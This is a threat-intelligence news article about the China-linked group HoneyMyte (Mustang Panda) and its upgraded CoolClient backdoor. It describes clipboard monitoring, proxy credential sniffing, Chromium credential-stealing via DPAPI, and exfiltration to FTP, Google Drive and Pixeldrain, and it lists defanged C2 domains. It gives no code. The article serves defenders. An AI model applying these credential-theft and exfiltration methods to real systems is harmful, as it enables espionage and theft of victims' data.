Mustang Panda Upgrades CoolClient Backdoor with Clipboard Monitoring and Credential Theft Capabilities
The China-linked advanced persistent threat group HoneyMyte, also known as Mustang Panda or Bronze President, has significantly upgraded its CoolClient backdoor with new surveillance capabilities including clipboard monitoring, HTTP proxy credential sniffing, and browser credential theft, according to research published by Kaspersky.
The group continues to actively target government entities across Asia and Europe, with Southeast Asia being the most affected region. In 2025, researchers observed HoneyMyte deploying an enhanced CoolClient backdoor alongside multiple browser login data stealer variants and scripts designed for document theft and reconnaissance.
CoolClient Backdoor Evolves with New Features
CoolClient, first discovered by Sophos in 2022 and updated versions documented by TrendMicro in 2023, has evolved considerably. The latest variant has been observed in campaigns targeting Myanmar, Mongolia, Malaysia, and Russia, often deployed as a secondary backdoor alongside PlugX and LuminousMoth infections.
The backdoor is delivered through DLL sideloading using legitimate signed executables. Between 2021 and 2025, the threat actor abused signed binaries from BitDefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions to load malicious DLLs.
Core CoolClient functionality includes detailed system and user information collection, file upload and deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin execution for running additional in-memory modules. The latest variant adds two significant new capabilities: clipboard monitoring and HTTP proxy credential sniffing.
Clipboard and Active Window Monitoring
The new clipboard monitoring feature captures clipboard contents using GetClipboardData while simultaneously tracking the window title, process ID, and timestamp of the user's active window. This enables attackers to monitor user behavior, identify applications in use, and determine the context of data copied at any given moment.
Captured clipboard contents and active window information are encrypted using XOR with byte key 0xAC and written to C:\ProgramData\AppxProvisioning.xml.
HTTP Proxy Credential Extraction
CoolClient now extracts HTTP proxy credentials from network traffic by creating dedicated threads to intercept and parse raw network packets on each local IP address. The malware analyzes TCP payloads to locate Proxy-Connection headers, then extracts and decodes Base64-encoded credentials from Proxy-Authorization headers for exfiltration to command-and-control servers.
Plugin Architecture Expands Capabilities
CoolClient supports multiple plugins for extended functionality. Researchers identified three plugins actively used in campaigns: ServiceMgrS.dll for service management including enumeration, creation, and deletion; FileMgrS.dll providing comprehensive file management with capabilities for compression, execution, and network drive mapping; and RemoteShellS.dll enabling remote command execution through a hidden cmd.exe process with redirected input and output.
The FileMgrS.dll plugin was observed being pushed through C2 channels during campaigns targeting Mongolia.
Browser Credential Stealers Target Multiple Browsers
Kaspersky discovered HoneyMyte deploying dedicated browser credential stealers during post-exploitation activities. Three variants were identified targeting Chrome, Edge, and Chromium-based browsers. The malware was observed in Myanmar, Malaysia, and Thailand, with particular focus on government sector targets.
In one documented campaign involving the ToneShell backdoor in Thailand, attackers first executed a Chrome credential stealer, then downloaded and ran an Edge credential stealer via curl, followed by exfiltrating Firefox cookie files to Google Drive using a curl command with a hardcoded OAuth bearer token.
The most flexible variant accepts runtime arguments specifying paths to Login Data and Local State files, enabling it to target any Chromium-based browser including Chrome, Edge, Brave, or Opera. The stealer extracts the encrypted AES key from Local State, decrypts it using Windows DPAPI, queries the Login Data SQLite database for saved credentials, and outputs decrypted results to C:\Users\Public\Libraries\License.txt.
Document Theft and Reconnaissance Scripts
HoneyMyte deployed multiple scripts for system enumeration and data exfiltration. A batch script named 1.bat downloads curl.exe and rar.exe, performs network enumeration using nbtscan, collects system information including stored credentials, registry keys, startup items, and antivirus details, then compresses and exfiltrates browser data and documents to an FTP server.
A PowerShell script named Ttraazcs32.ps1 collects computer, user, and network information including public IP and Wi-Fi data, then searches drives for recently modified documents with extensions including .doc, .xls, .pdf, .tif, and .txt modified within the last 60 days.
Another PowerShell script named t.ps1 specifically targets browser credentials, extracting and decrypting the Chrome encrypted_key before compressing stolen data into a password-protected archive and uploading it to Pixeldrain using a hardcoded API token, demonstrating HoneyMyte's shift toward abusing public file-sharing services for covert exfiltration.
Rootkit Development Underway
Researchers noted that in recent campaigns targeting Pakistan and Myanmar, HoneyMyte introduced a newer CoolClient variant that drops and executes a previously unseen rootkit. Technical analysis of this rootkit will be published separately.
Indicators of Compromise
CoolClient C2 infrastructure includes account.hamsterxnxx[.]com, popnike-share[.]com, and japan.Lenovoappstore[.]com. Multiple file hashes are associated with CoolClient components, plugins, browser stealers, and exfiltration scripts.
Organizations should remain vigilant against HoneyMyte's toolset including CoolClient, PlugX, ToneShell, Qreverse, and related LuminousMoth malware, as these operations are designed to maintain persistent access while conducting high-value surveillance activities.
